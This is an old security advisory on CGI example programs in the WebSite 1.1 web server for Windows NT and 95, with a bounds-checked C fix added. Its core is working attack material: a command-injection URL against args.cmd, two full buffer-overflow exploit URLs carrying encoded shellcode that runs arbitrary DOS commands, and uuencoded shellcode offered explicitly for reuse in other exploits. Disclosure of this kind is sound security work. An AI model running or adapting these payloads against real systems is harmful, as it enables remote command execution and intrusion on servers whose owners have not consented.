DATE:
COMMAND:
SOURCE:
AUTHOR:

WebSite

SYSTEMS AFFECTED: WinNT, Win95 (WebSite 1.1)

PROBLEM

There are some nice security holes in WebSite v1.1e for Windows NT and '95, in the CGI example programs.

The first thing you will notice is about the scripts: they have the following lines in cgi-dos/args.cmd (and some others):

    rem NEVER NEVER ECHO URL COMPONENTS UNQUOTED!!! Consider
    rem a query string of xxx&del+/s+c:\*.* Your hard drive gets
    rem erased!! Same goes for args and extra path info!!!

and then some lines like this:

    echo QUERY_STRING="%QUERY_STRING%"

The quotes do not help: a query string that begins with a double quote closes the quoted value, so the & that follows it is interpreted by the command interpreter as a command separator rather than as data. The exploit can be:

    http://website.host/cgi-dos/args.cmd?"&any+dos+command"

There is also an example C program, compiled to cgi-shl/win-c-sample.exe, with the source provided in cgi-src/win-c-sample/win-c-sample.c, and the following line in there:

    char *argv[32]; // Max 32 command line args

That is a WinMain local variable, and it is passed to SplitArgs(), which does no bounds checking while filling it with the command line parameters. You know what that means -- a nice buffer overflow.
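For comparison, here is what a bounds-checked argument splitter for the same 32-slot argv[] looks like. This is an added example written for this note, not the WebSite sample's SplitArgs(); the function name, the '+' separator and the test inputs are assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_ARGS 32   /* the same fixed limit as the sample's "char *argv[32]" */
/* Bounded argument splitter, written for this note as an illustration (it is
 * not the WebSite sample's SplitArgs()). Splits a '+'-separated CGI query into
 * argv[] without ever writing past max_args slots, the check the sample lacked.
 * Returns the count or -1; on success *storage holds the token buffer to free. */
int split_args_bounded(const char *query, char **argv, int max_args, char **storage)
{
    size_t len = strlen(query);
    char *buf = malloc(len + 1);          /* private copy we can cut into tokens */
    *storage = NULL;
    if (buf == NULL)
        return -1;
    memcpy(buf, query, len + 1);
    int argc = 0;
    char *p = buf;
    while (*p != '\0') {
        if (argc >= max_args) {           /* would overflow the caller's argv[] */
            free(buf);
            return -1;
        }
        argv[argc++] = p;
        char *plus = strchr(p, '+');
        if (plus == NULL)
            break;
        *plus = '\0';                     /* terminate this token, step past '+' */
        p = plus + 1;
    }
    *storage = buf;
    return argc;
}

int main(void)
{
    char *argv[MAX_ARGS], *storage;
    /* Constructed inputs: a normal three-argument query and one carrying far
     * more '+'-separated tokens than argv[] has room for. */
    char flood[128] = "";
    for (int i = 0; i < 40; i++)
        strcat(flood, "-+");
    int n = split_args_bounded("copy+readme.1st+x1.htm", argv, MAX_ARGS, &storage);
    printf("normal query: %d args, argv[0]=%s\n", n, argv[0]);
    free(storage);
    n = split_args_bounded(flood, argv, MAX_ARGS, &storage);
    printf("flooded query: %d (rejected instead of overflowing)\n", n);
    return 0;
}
```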
Here are the exploits (Solar split the long URLs into several lines); you can use any DOS command in them (replace spaces with _'s).

WinNT (any version?):

    http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-
    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C6Lj%01V%8A
    %06<_u%03%80.?FAI%84%C0u%F0h0%10%F0wYhM\y[X%050PzPA9%01u%F0%83%E9%10%
    FF%D1h0%10%F0wYh%D0PvLX%0500vPA9%01u%F0%83%E9%1C%FF%D1cmd.exe_/c_copy
    _\WebSite\readme.1st_\WebSite\htdocs\x1.htm

Win95 (the release version only, will crash others!):

    http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-
    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C62j%01V%8A
    %06<_u%03%80.?FAI%84%C0u%F0%BAto|_%B9t`}`%03%CA%FF%D1%BAX_|_%B9XP|`%0
    3%CA%FF%D1c:\command.com_/c_copy_\WebSite\readme.1st_\WebSite\htdocs\
    x1.htm

The example DOS commands just copy WebSite's readme.1st file, so you can later check whether the exploit worked by trying http://website.host/x1.htm. Note that the server should respond to these exploits with an "Error: no blank line separating header and data", because the "1 file(s) copied" message appears without a blank line before it (HTTP requires that blank line between header and data). If you need a command's output, you can redirect it to a file and fetch that file via HTTP with a separate request.

The solution Solar used in the exploits above is a call to a fixed kernel offset. Actually, the WinNT exploit does pattern searches in the kernel (because of the number of different kernel versions out there), while the Win95 one uses fixed offsets (Solar doesn't have Win95 himself; thanks go to Lord Byte for loading his WinIce and telling him the offsets). The two functions used are WinExec and ExitProcess. Here are the two shellcodes in binary, uuencoded, so you can use them in your own exploits if you wish.
begin 644 shell_nt.bin
M:%Y8_^;_U(/&3&H!5HH&/%]U`X`N/T9!283`=?!H,!#P=UEH35QY6U@%,%!Z
F4$`77P@^D0_]%H,!#P=UEHT%!V3%@%,#!V4$`77P@^D<_]'[
`
end

begin 644 shell_95.bin
M:%Y8_^;_U(/&,FH!5HH&/%]U`X`N/T9!283`=?"Z=&]\7[ET8'U@`\K_T;I8
,7WQ?N5A0?&`#RO_1
`
end

Credit for this discovery goes to Solar Designer.

EXPLOIT

SOLUTION

Just remove the examples after you, the Webmaster, have checked them out. Also, the holes will probably get fixed in the next WebSite release.